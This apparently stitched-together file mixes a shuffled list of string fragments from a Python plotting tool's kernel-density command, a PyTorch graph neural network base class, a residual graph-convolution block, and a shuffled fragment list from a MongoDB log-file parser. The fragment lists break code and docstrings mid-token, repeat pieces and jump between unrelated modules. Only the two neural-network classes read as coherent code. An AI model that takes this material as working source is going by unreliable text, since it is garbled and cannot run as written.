plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename", "| +-----------------+-------------------+ | * | stars | +-----------------+-------------------+ logx DEPRECATED:", "time-series to plot on secondary y-axis. mark_right [optional, default is", "case subplots=True, share x axis. sharey [optional, default to False]", "as `vlines_x`. If a single number will be the maximum", "of random subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead.", "x-axis of the plot. For example, '--xlim 1,1000' would limit", "else: # short freq string (day) OR (2 day) short_freq", "step-plots. 'steps' is equivalent to 'steps-pre' and is maintained for", "1], # colors=[str, [\"pass\", []], None], # linestyles=[str, [\"domain\", [\"auto\",", "series. sharex [optional, default to True] In case subplots=True, share", "+-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"' instead. 
logy DEPRECATED: use '--yaxis=\"log\"'", "itertools import os import warnings import mando import numpy as", "[]], 1], # title=[str, [\"pass\", []], 1], # figsize=[float, [\"range\",", "ax.get_ylim() if vlines_ymin is None: vlines_ymin = nylim[0] if vlines_ymax", "por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\",", "True] When using a secondary_y axis, should the legend label", "day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq = \"\" if", "on the command line a comma separated list, or a", "[optional, defaults to 500] The number of random subsets of", "invert_yaxis=[bool, [\"domain\", [True, False]], 1], # plotting_position=[ # str, #", "# ], # None, # ], # hlines_y=[float, [\"pass\", []],", "\", \" \"] + plotutils.LINE_LIST], # None, # ], #", "style=[str, [\"pass\", []], None], # xlim=[float, [\"pass\", []], 2], #", "None: icolors = itertools.cycle(colors) else: icolors = None imarkerstyles =", "[]], 1], # ytitle=[str, [\"pass\", []], 1], # title=[str, [\"pass\",", "the values for the probability plots. Only used for norm_xaxis,", "\", \" \"] + plotutils.LINE_LIST], None], # markerstyles=[str, [\"domain\", [\"auto\",", "1], # label_skip=[int, [\"range\", [1, None]], 1], # drawstyle=[str, [\"pass\",", "False] Invert the y-axis. plotting_position : str [optional, default is", "c = None if imarkerstyles is not None: m =", "'scatter_matrix', this specifies the plot along the diagonal. One of", "else i for i in markerstyles] if colors is not", "for the vertical lines. If a single linestyle then will", "`hlines_y`. If a single number will be the maximum x", "be used as the color for all horizontal lines. If", "within Python, and `ofilename` is None will return the Matplotlib", "\"muted\" are all styles that are setup to be able", "nxlim = ax.get_xlim() if hlines_xmin is None: hlines_xmin = nxlim[0]", "if c is not None: plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line,", ") # @tsutils.validator( # ofilename=[str, [\"pass\", []], 1], # type=[str,", "not None: if type in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x =", "None] List of minimum y values to start the vertical", "target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin,", "Output filename for the plot. Extension defines the type, for", ") for index, line in enumerate(ax.lines): if icolors is not", "[\" \"] else: linestyles = [\" \" if i in", "--type=\"norm_yaxis\" * For --lognorm_xaxis use --type=\"lognorm_xaxis\" * For --lognorm_yaxis use", "`vlines_x`. If a single number will be used as the", "list/tuple, which time-series to plot on secondary y-axis. mark_right [optional,", "[\"domain\", [True, False]], 1], # mark_right=[bool, [\"domain\", [True, False]], 1],", "available, but if None is replaced by 'colors', 'linestyles', and", "figsize : str [optional, defaults to '10,6.5'] The 'width,height' of", "defaults to None] List of minimum x values to start", "| +-------+----------------+ | h | hexagon1 | +-------+----------------+ | H", "): warnings.warn( \"\"\" * * The --logx, --logy, --norm_xaxis, --norm_yaxis,", "DEPRECATED: use '--xaxis=\"log\"' instead. logy DEPRECATED: use '--yaxis=\"log\"' instead. 
xlim", "filename for the plot. Extension defines the type, for example", "on secondary y-axis. mark_right [optional, default is True] When using", "[\"pass\", []], 1], # grid=[bool, [\"domain\", [True, False]], 1], #", "Number between 0 and 1 that represents the level of", "1000, where '--xlim ,1000' would base the lower limit on", "data set. You must supply a comma separated list of", "Estimation or 'hist' for a histogram. bootstrap_size : int [optional,", "== \"auto\": markerstyles = plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles) if", "plotting_position : str [optional, default is 'weibull'] {plotting_position_table} Only used", "str, # [ # \"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\",", "\"vibrant\", # \"muted\", # \"retro\", # ], # ], #", "list of strings if using the Python API. +-----------------+-------------------+ |", "or a list of strings if using the Python API.", "source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x,", "if os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else i for i in", "lag used if ``type`` \"lag_plot\" is chosen. xtitle : str", "default is True] When using a secondary_y axis, should the", "then will be used as the color for all horizontal", "or lognorm_yaxis is True ): warnings.warn( \"\"\" * * The", "a comma separated matplotlib color codes, or within Python a", "set. subplots [optional, defaults to False] Make separate subplots for", ": int [optional, defaults to 50] The size of the", "\"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\", \"muted\", and \"retro\". If", "is True or lognorm_yaxis is True ): warnings.warn( \"\"\" *", "pltfreq.split(\" \")[0][1:] == \"1\": beginstr = 3 else: beginstr =", "label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values,", "defaults with the implementation of # mando legend = bool(legend", "1], # legend_names=[str, [\"pass\", []], 1], # subplots=[bool, [\"domain\", [True,", "as `vlines_x`. If a single number will be used as", "List of maximum x values to end each horizontal line.", "the names in the data set. You must supply a", "[\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\", [1, None]], 1], # xtitle=[str,", "# legend=[bool, [\"domain\", [True, False]], 1], # legend_names=[str, [\"pass\", []],", "[True, False]], 1], # sharey=[bool, [\"domain\", [True, False]], 1], #", "itertools.cycle(linestyles) # Only for bar, barh, bar_stacked, and barh_stacked. ibar_hatchstyles", "if len(nstyle) != len(tsd.columns): raise ValueError( tsutils.error_wrapper( \"\"\" You have", "where N is a number from 0 to 9 that", "if ( logx is True or logy is True or", "| x | x | +-------+----------------+ | D | diamond", "SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\",", "[\"domain\", [\"kde\", \"hist\"]], 1], # bootstrap_size=[int, [\"range\", [0, None]], 1],", "'linestyles', and 'markerstyles' instead of using the 'style' keyword. 
+---------+--------------+", "if icolors is not None: c = next(icolors) else: c", "style != \"auto\": nstyle = tsutils.make_list(style) if len(nstyle) != len(tsd.columns):", "style. hlines_linestyles: [optional, defaults to None] List of linestyles for", ": str [optional, defaults is ''] Will add a match", "used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values", "will iterate through the available matplotlib hatch types. Otherwise on", "DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"' instead. lognorm_xaxis", "True: plt.legend(loc=\"best\") if hlines_y is not None: hlines_y = tsutils.make_list(hlines_y)", "logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples,", "= None if ilinestyles is not None: l = next(ilinestyles)", "print the frequency try: try: pltfreq = str(tsd.index.freq, \"utf-8\").lower() except", "| thin diamond | +-------+----------------+ | _ | hlines_y |", "vlines_ymin=[float, [\"pass\", []], None], # vlines_ymax=[float, [\"pass\", []], None], #", "next(icolors) else: c = None if imarkerstyles is not None:", "| 1 | tri_down | +-------+----------------+ | 2 | tri_up", "from the color pallette in the current plot style. vlines_linestyles:", "plotutils.LINE_LIST else: linestyles = tsutils.make_list(linestyles) if bar_hatchstyles == \"auto\": bar_hatchstyles", "[] markerstyles = [] linestyles = [] for st in", "for the x-axis of the plot. For example, '--xlim 1,1000'", "\"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y", "the standard linestyles list. \"\"\" plt = kde( input_ts=input_ts, columns=columns,", "1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1], # bootstrap_size=[int, [\"range\",", "draw nothing | +---------+--------------+ | '' | draw nothing |", "list of strings if using the Python API. To not", "/ | diagonal hatching | +-----------------+-------------------+ | ``\\`` | back", "markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is None: linestyles = [\"", "lag_plot_lag=[int, [\"range\", [1, None]], 1], # xtitle=[str, [\"pass\", []], 1],", "== \"True\" or legend is None) type = \"kde\" import", "separated lower and upper limits for the x-axis of the", "used as the color for all horizontal lines. If a", "formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False,", "'linestyles', and 'markerstyles' instead of using the 'style' keyword. +-------+----------------+", "are all styles that are setup to be able to", "line style code. grid [optional, default is False] Whether to", "is based on range of y values] Comma separated lower", "if using the Python API. +-----------------+-------------------+ | bar_hatchstyles | Description", "the Python API. +-----------------+-------------------+ | bar_hatchstyles | Description | +=================+===================+", "hlines_linestyles: [optional, defaults to None] List of linestyles for the", "sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis,", "for the entire plot. 
hlines_xmax: [optional, defaults to None] List", "iterate through the available matplotlib line types. Otherwise on the", "None] else i for i in linestyles] markerstyles = [\"", "in [\" \", None] else i for i in linestyles]", "a line style code. grid [optional, default is False] Whether", "of the xaxis. One of 'arithmetic', 'log'. yaxis : str", "Density Estimation or 'hist' for a histogram. bootstrap_size : int", ") colors = [] markerstyles = [] linestyles = []", "# [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"], # ],", "API. To not display lines use a space (' ')", "List of x values where to place a vertical line.", "associated with the input data. The 'legend_names' option allows you", "data set. subplots [optional, defaults to False] Make separate subplots", "| 'steps-post'] por [optional] Plot from first good value to", "from 1 to 1000, where '--xlim ,1000' would base the", "{index_type} {names} {source_units} {target_units} {round_index} plot_styles: str [optional, default is", "= True xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis)", "hlines_xmin is None: hlines_xmin = nxlim[0] if hlines_xmax is None:", "be used as the linestyle for all horizontal lines. If", "plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None,", "space (' ') as the linestyle code. Separated 'colors', 'linestyles',", "if i is None else i for i in markerstyles]", "size of the random subset for 'bootstrap' plot. bootstrap_samples [optional,", "| solid | +---------+--------------+ | -- | dashed | +---------+--------------+", "density estimation of probability density function. \"kde\" will create a", "set. You must supply a comma separated list of strings", "[True, False]], 1], # plotting_position=[ # str, # [ #", "are deprecated. * * For --logx use --xaxis=\"log\" * For", "# ], # prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]], 1], # plot_styles=[", "nstyle: colors.append(st[0]) if len(st) == 1: markerstyles.append(\" \") linestyles.append(\"-\") continue", "Python API. +-----------------+-------------------+ | bar_hatchstyles | Description | +=================+===================+ |", "warnings.warn( \"\"\" * * The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis,", "\"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles,", "black, white, and gray, however the \"ieee\" also will change", "will be used as the color for all vertical lines.", "functions for the manipulation of time series.\"\"\" from __future__ import", "| +-------+----------------+ | '' | nothing | +-------+----------------+ Marker reference:", "minimum x value for the entire plot. vlines_ymax: [optional, defaults", "\"none\": short_freq = \"\" else: # short freq string (day)", "bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq,", "value for the entire plot. vlines_colors: [optional, defaults to None]", "of linestyles for the horizontal lines. If a single linestyle", "to plot grid lines on the major ticks. label_rotation :", "linestyle for all horizontal lines. 
If a list must be", "[\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\", [True, False]], 1], #", "], # vlines_x=[float, [\"pass\", []], None], # vlines_ymin=[float, [\"pass\", []],", "plotutils.LINE_LIST], # None, # ], # vlines_x=[float, [\"pass\", []], None],", "'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"'", "-- | dashed | +---------+--------------+ | -. | dash_dot |", "# por=[bool, [\"domain\", [True, False]], 1], # invert_xaxis=[bool, [\"domain\", [True,", "else: beginstr = 1 if pltfreq == \"none\": short_freq =", "| +---------+--------------+ | None | draw nothing | +---------+--------------+ |", "implementation of # mando legend = bool(legend == \"\" or", "sharey [optional, default to False] In case subplots=True, share y", "lognorm_yaxis is True ): warnings.warn( \"\"\" * * The --logx,", "will return the Matplotlib figure that can then be changed", "por [optional] Plot from first good value to last good", "[optional, default to \"auto\", only used if type equal to", "end. {force_freq} invert_xaxis [optional, default is False] Invert the x-axis.", "types. Otherwise on the command line a comma separated list,", "x value for the entire plot. vlines_ymax: [optional, defaults to", "colors=[str, [\"pass\", []], None], # linestyles=[str, [\"domain\", [\"auto\", None, \"\",", "{plotting_position_table} Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and", "\"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\",", "white, and gray, however the \"ieee\" also will change the", "figsize=figsize, ) for index, line in enumerate(ax.lines): if icolors is", "+ \".mplstyle\")) else i for i in plot_styles ] plt.style.use(plot_styles)", "of linestyles for the vertical lines. If a single linestyle", "the probability plots. Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis,", "xaxis : str [optional, default is 'arithmetic'] Defines the type", "Set to a line style code. grid [optional, default is", "[\"pass\", []], 1], # figsize=[float, [\"range\", [0, None]], 2], #", "values for all vertical lines. A missing value or None", "# \"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\"," ]
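# A small self-contained sketch (not part of the package) of how the
# 'ColorMarkerLine' shorthand documented above decomposes; the
# ``marker_list`` default is a stand-in for plotutils.MARKER_LIST.
def _split_style_shorthand(st, marker_list=("*", "o", ".", "x", "D")):
    """Split one style string into (color, marker, linestyle).

    _split_style_shorthand("r*--") -> ("r", "*", "--")  # red, star, dashed
    _split_style_shorthand("b")    -> ("b", " ", "-")   # blue solid line
    _split_style_shorthand("g-.")  -> ("g", " ", "-.")  # green dash_dot
    """
    color = st[0]
    if len(st) == 1:
        # Color only: no marker, solid line.
        return color, " ", "-"
    if st[1] in marker_list:
        # Color plus marker, with an optional trailing linestyle.
        return color, st[1], st[2:] or " "
    # Color plus linestyle, no marker.
    return color, " ", st[1:]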
from collections import OrderedDict

import torch
import torch.nn as nn
from torch_geometric.data.batch import Batch


class GNN(nn.Module):
    def __init__(self, mp_steps, **config):
        super().__init__()
        self.mp_steps = mp_steps
        self.update_fns = self.assign_update_fns()
        self.readout_fns = self.assign_readout_fns()

    def assign_update_fns(self) -> OrderedDict:
        raise NotImplementedError

    def assign_readout_fns(self) -> dict:
        raise NotImplementedError

    def forward(self, batch: Batch, output_all_steps=True):
        edge_index = batch.edge_index
        sections = (
            torch.bincount(batch.batch).tolist() if hasattr(batch, "batch") else None
        )
        hiddens = self.initialize(batch)
        del batch

        # Update attributes with update and aggregation step.
        outputs = {element: [] for element in self.readout_fns.keys()}

        for step in range(self.mp_steps):
            hiddens = self.step(edge_index=edge_index, sections=sections, **hiddens)

            if not output_all_steps and (step + 1) != self.mp_steps:
                continue
            for element, readout_fn in self.readout_fns.items():
                outputs[element].append(readout_fn(**hiddens))

        return outputs

    def initialize(self, batch):
        hiddens = {}
        # Initialize attributes through embeddings and initialize the
        # LSTM states to None.
        for element in self.embeddings.keys():
            embedding = self.embeddings[element](batch[f"{element}_input"])
            hiddens.update(
                {
                    f"{element}_input": embedding,
                    f"{element}_embedding": embedding.clone(),
                    f"{element}_lstm": None,
                }
            )
        return hiddens

    def step(self, edge_index, sections, **hiddens):
        """Perform a message passing step by propagating information and
        updating each element."""
        for element, update_fn in self.update_fns.items():
            hiddens[f"{element}_embedding"], hiddens[f"{element}_lstm"] = update_fn(
                edge_index=edge_index, sections=sections, element=element, **hiddens
            )
        return hiddens
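# A minimal sketch (illustrative only, not from the original training
# code) of how GNN is intended to be subclassed: the child supplies the
# ``embeddings`` ModuleDict that ``initialize`` expects, plus the update
# and readout callables the base class cycles through.  Every name below
# ("node", ToyGNN, the linear layers) is an assumption for the example.
class ToyGNN(GNN):
    def __init__(self, mp_steps, num_inputs=8, state_dim=16, num_classes=2):
        super().__init__(mp_steps)
        self.embeddings = nn.ModuleDict({"node": nn.Linear(num_inputs, state_dim)})
        self.node_update = nn.Linear(state_dim, state_dim)
        self.node_readout = nn.Linear(state_dim, num_classes)

    def assign_update_fns(self) -> OrderedDict:
        # Each update function returns (new_embedding, new_lstm_state);
        # this sketch keeps no recurrent state, so the second element
        # stays None.
        def update_node(edge_index, sections, element, **hiddens):
            return torch.relu(self.node_update(hiddens["node_embedding"])), None

        return OrderedDict(node=update_node)

    def assign_readout_fns(self) -> dict:
        return {"node": lambda **hiddens: self.node_readout(hiddens["node_embedding"])}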
# vivek-r-2000/BoundaryNet
import math

import torch
import torch.nn as nn
from torch.nn.modules.module import Module

from GNN.GCN_layer import GraphConvolution


class GraphResConvolution(Module):
    """
    Residual GCN block: two GraphConvolution layers (similar to
    https://arxiv.org/abs/1609.02907) with a skip connection around them.
    """

    def __init__(self, state_dim, name=''):
        super(GraphResConvolution, self).__init__()
        self.state_dim = state_dim
        self.gcn_1 = GraphConvolution(state_dim, '%s_1' % name)
        self.gcn_2 = GraphConvolution(state_dim, '%s_2' % name)
        self.relu1 = nn.ReLU()
        self.relu2 = nn.ReLU()
        self.name = name

    def forward(self, input, adj):
        output_1 = self.gcn_1(input, adj)
        output_1_relu = self.relu1(output_1)

        output_2 = self.gcn_2(output_1_relu, adj)
        output_2_res = output_2 + input  # residual connection

        output = self.relu2(output_2_res)
        return output

    def __repr__(self):
        return self.__class__.__name__ + ' (' + self.name + ')'
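# --- Usage sketch (not part of the original source) ---------------------------
# GraphConvolution's source is not shown here, so the shapes below are
# assumptions: it is used above as gcn(input, adj) and must return features of
# the same state_dim for the residual add in forward() to be shape-preserving.
#
#   block = GraphResConvolution(state_dim=64, name='res1')
#   x = torch.randn(2, 10, 64)     # (batch, nodes, state_dim)
#   adj = torch.rand(2, 10, 10)    # dense adjacency
#   out = block(x, adj)            # same shape as x
#   print(block)                   # "GraphResConvolution (res1)"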
[ "moved_from = \"Unknown\" note = match.group('note') if note == \"success\":", "streams or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide logfile as open", "if not self._num_lines: self._iterate_lines() return self._num_lines @property def restarts(self): \"\"\"Lazy", "seek position is wrong line = self.filehandle.readline() if isinstance(line, bytes):", "because next() iterator uses internal readahead # buffer so seek", "if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if self.binary ==", "previous file position for loop detection in _find_curr_line() self.prev_pos =", "\"\"\"Lazily return the chunks moved from this shard (if available)\"\"\"", "over file and find any sharding related information \"\"\" self._shards", "parsing loop detected trying to find previous \" \"log line", "return self.next() self.filehandle.seek(newline_pos - jump_back + 1, 1) # roll", "(\"is now in state\" in line and # next(state for", "datetime format.\"\"\" if self._year_rollover is None: self._calculate_bounds() return self._year_rollover @property", "not self._shards: self._find_sharding_info() return self._shards @property def csrs(self): \"\"\"Lazily return", "match = re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if", "auto-split chunk\" in line: logevent = LogEvent(line) match = re.search(\"chunk", "self._shards.append(shard_info) elif self.binary == \"mongod\": logevent = LogEvent(line) if \"New", "next(self): \"\"\"Get next line, adjust for year rollover and hint", "repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines()", "engine. There were only two engines, MMAPv1 and WiredTiger \"\"\"", "the storage engine. There were only two engines, MMAPv1 and", "self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage engine if", "to eliminate most lines) if \"version\" in line[:100]: logevent =", "input currently. 
\"\"\" if self.from_stdin: return None if not self._filesize:", "next(state for state in states if line.endswith(state))): if \"is now", "file position for loop detection in _find_curr_line() self.prev_pos = None", ":: (?P<error>\\S+): ', line) if match: time = logevent.datetime split_range", "has any level lines.\"\"\" if self._has_level is None: self._iterate_lines() return", "in logevent.line_str or 'mongos' in logevent.line_str): self._binary = 'mongos' else:", "le = self.next() if le.datetime and le.datetime >= start_dt: self.filehandle.seek(0)", "self._csrs and match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif", "admin.$cmd command: { replSetInitiate:\" in line: match = re.search('{ _id:", "adjust for year rollover and hint datetime format.\"\"\" # use", "if match: csrs_info = (match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info else:", "loop detection in _find_curr_line() self.prev_pos = None self._has_level = None", "if not self._num_lines: self._iterate_lines() return self._hostname @property def port(self): \"\"\"Lazy", "== 'initandlisten' and \"db version v\" in logevent.line_str): self._binary =", "0 self._restarts = [] self._rs_state = [] ln = 0", "able to find a valid log line within max_start_lines max_start_lines", "format\" % self.filehandle.name) # get end datetime (lines are at", "most 10k, # go back 30k at most to make", "os import re import sys from datetime import datetime from", "in LogEvent.log_components): self._has_level = True # find version string (fast", "chunks_moved_to(self): \"\"\"Lazily return the chunks moved to this shard (if", "self._chunks_moved_from = [] self._chunks_moved_to = [] self._chunk_splits = [] prev_line", "\"\"\"Lazy evaluation of the datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds()", "in line: # look for hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)',", "buff = self.filehandle.read(curr_pos) hr = \"-\" * 60 print(\"Fatal log", "to be forwarded manually, and it will miss the first", "if \"version\" in line[:100]: logevent = LogEvent(line) restart = self._check_for_restart(logevent)", "match.group('errmsg') else: errmsg = \"Unknown\" chunk_migration = (time, chunk_range, moved_to,", "\"<stdin>\" self._bounds_calculated = False self._start = None self._end = None", "tokens[-1] in self.states: rs_state = tokens[-1] else: # 2.6 if", "in line: logevent = LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' '", "match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg = match.group('errmsg')", "need to be forwarded manually, and it will miss the", "hr), file=sys.stderr) raise SystemExit(\"Cannot parse %s with requested options\" %", "csrs_info else: match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match:", "self._end @property def timezone(self): \"\"\"Lazy evaluation of timezone of logfile.\"\"\"", "\"\"\" For 3.2 the \"[initandlisten] options:\" no longer contains the", "not self._datetime_format: self._calculate_bounds() return self._datetime_format @property def has_level(self): \"\"\"Lazy evaluation", "\"[initandlisten] options:\" long entry contained the \"engine\" field if WiredTiger", "end of file return None def _find_sharding_info(self): \"\"\" Iterate over", "\" 'in namespace (?P<namespace>\\S+)' ' :: caused by :: (?P<error>\\S+):", "if not self._num_lines: self._iterate_lines() return self._repl_set_version 
@property def repl_set_protocol(self): \"\"\"Return", "if match: self._repl_set_protocol = match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+ ])',", "None self._end = None self._filesize = None self._num_lines = None", "name.\"\"\" if not self._num_lines: self._iterate_lines() return self._binary @property def hostname(self):", "re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: shard_info = (match.group('shardName'), match.group('replSetMembers'))", "and \"db version v\" in logevent.line_str): self._binary = 'mongod' elif", "not self._num_lines: self._iterate_lines() return self._repl_set_members @property def repl_set_version(self): \"\"\"Return the", "over LogFile object. Return a LogEvent object for each line", "or v != versions[-1]: versions.append(v) return versions @property def repl_set(self):", "else: self._year_rollover = False # reset logfile self.filehandle.seek(0) self._bounds_calculated =", "print_function import os import re import sys from datetime import", "the CSRS (if available)\"\"\" if not self._csrs: self._find_sharding_info() return self._csrs", "self._filesize @property def datetime_format(self): \"\"\"Lazy evaluation of the datetime format.\"\"\"", "self.binary == \"mongod\": logevent = LogEvent(line) if \"New replica set", "if \"Finding the split vector for\" in line: logevent =", "namespace, numSplits, success, time_taken, error)) elif \"jumbo\" in line: logevent", "def _check_for_restart(self, logevent): if (logevent.thread == 'initandlisten' and \"db version", "\"\"\" self._shards = [] self._chunks_moved_from = [] self._chunks_moved_to = []", "0 # get start datetime for line in self.filehandle: logevent", "shards(self): \"\"\"Lazily return the shards (if available)\"\"\" if not self._shards:", "re.search('replSet: \"(?P<replSet>\\S+)\"', line) if match: self._repl_set = match.group('replSet') match =", "= re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if self._csrs and", "bytes): line = line.decode('utf-8', 'replace') if line == '': raise", "return the shards (if available)\"\"\" if not self._shards: self._find_sharding_info() return", "note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector for\" in", "@property def restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not", "match.group('numSplits') success = None time_taken = 0 error = None", "\"\"\" Fast-forward file to given start_dt datetime obj using binary", "chunks moved from this shard (if available)\"\"\" if not self._chunks_moved_from:", "if there was a roll-over, subtract 1 year from start", "and find last newline char jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back,", "self._num_lines: self._iterate_lines() return self._num_lines @property def restarts(self): \"\"\"Lazy evaluation of", "command: { replSetInitiate:\" in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\",", "and match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not", "and hint datetime format.\"\"\" # use readline here because next()", "self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread == 'initandlisten' and \"db", "to find moved from shard name when SERVER-45770 TICKET is", ">= start_dt: self.filehandle.seek(0) return le = None self.filehandle.seek(0) # search", "file stream or stdin.\"\"\" self.filehandle = filehandle self.name = 
filehandle.name", "note = match.group('note') if note == \"success\": errmsg = None", "\\[(?P<range>.*)\\)', prev_line) if match: time = logevent.datetime split_range = match.group(\"range\")", "self._has_level is None: self._iterate_lines() return self._has_level @property def year_rollover(self): \"\"\"Lazy", "line) else: match = re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line)", "are calculated before starting to iterate, # including potential year", "evaluation of start and end of logfile. Returns None for", "= 'mongos' else: return False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if", "split_range, namespace, numSplits, success, time_taken, error)) prev_line = line #", "self._datetime_format = le.datetime_format self._datetime_nextpos = le._datetime_nextpos return le def __iter__(self):", "class LogFile(InputSource): \"\"\"Log file wrapper class. Handles open file streams", "file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count number of lines (can", "\"\"\" Iterate over file and find any sharding related information", "replica set monitor for\" in line: if \"[mongosMain]\" in line:", "chunk_range, moved_from, namespace, steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the", "try: logevent = self.next() while not logevent.datetime: logevent = self.next()", "logevent.datetime split_range = None namespace = match.group(\"namespace\") numSplits = match.group('numSplits')", "moved to this shard (if available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info()", "[] self._chunk_splits = [] prev_line = \"\" for line in", "elif self.binary == \"mongod\": logevent = LogEvent(line) if \"New replica", "repl_set(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines()", "namespace = match.group('namespace') # TODO: alter this to find moved", "csrs(self): \"\"\"Lazily return the CSRS (if available)\"\"\" if not self._csrs:", "self.filesize step_size = max_mark # check if start_dt is already", "self._csrs = None self._chunks_moved_from = None self._chunks_moved_to = None self._chunk_splits", "MMAPv1 and WiredTiger \"\"\" if \"[initandlisten] options:\" in line: match", "(?P<stepTimes>\\d+)', line) else: match = re.search(':: caused by :: (?P<errmsg>\\S+):',", "\"\"\" Lazy evaluation of the number of lines. 
